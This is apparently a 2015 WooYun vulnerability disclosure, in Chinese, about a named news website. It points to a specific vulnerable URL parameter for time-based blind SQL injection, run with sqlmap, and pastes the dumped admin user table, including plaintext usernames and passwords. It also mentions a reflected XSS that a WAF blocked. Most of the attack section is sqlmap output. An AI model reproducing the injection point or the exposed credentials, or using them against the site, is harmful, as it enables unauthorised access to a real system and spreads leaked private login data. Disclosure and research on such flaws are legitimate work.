2015-07-22: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-09-05: 厂商已经主动忽略漏洞,细节向公众公开
关注时事新闻!
首先来第一发:
http://cq.takungpao.com/list.asp?classid=155
基于时间SQL盲注:
sqlmap跑下
Database: Microsoft_Access_masterdb[1 table]+----------+| tbl_user |+----------+
最近网速不好,我就列了下重要的数据。
这网速我也是醉了,实在受不鸟。好吧,我就列了最后的。唔
Database: Microsoft_Access_masterdbTable: tbl_user[2 entries]+--------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------+---------+| userid | access | username | userpwd |+--------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------+---------+| 1 | 134, 135, 75, 270, 88, 22, 153, 155, 159, 157, 161, 259, 124, 268, 266, 56, 136, 50, 154, 156, 158, 160, 162, 122, 78, 264, 121, 71, 76, 258, 293, 294, 295, 296, 297, 269, 54, 51, 260, 261, 262, 263, 89, 146, 171, 172, 173, 271, 236, 237, 238, 239, 240, 2 | cq | 123654 || 2 | 75, 88, 22, 155, 159, 157, 161, 259, 124, 268, 266, 56, 136, 50, 122, 78, 264, 121, 71, 76, 258, 269, 54, 51, 260, 261, 262, 263, 256, 257, 146, 32, 25, 139 | hy | hy |+--------+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
就跑了这一点点。第二发:XSS漏洞(反射型)
严格控制关键字。安全狗拦截
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)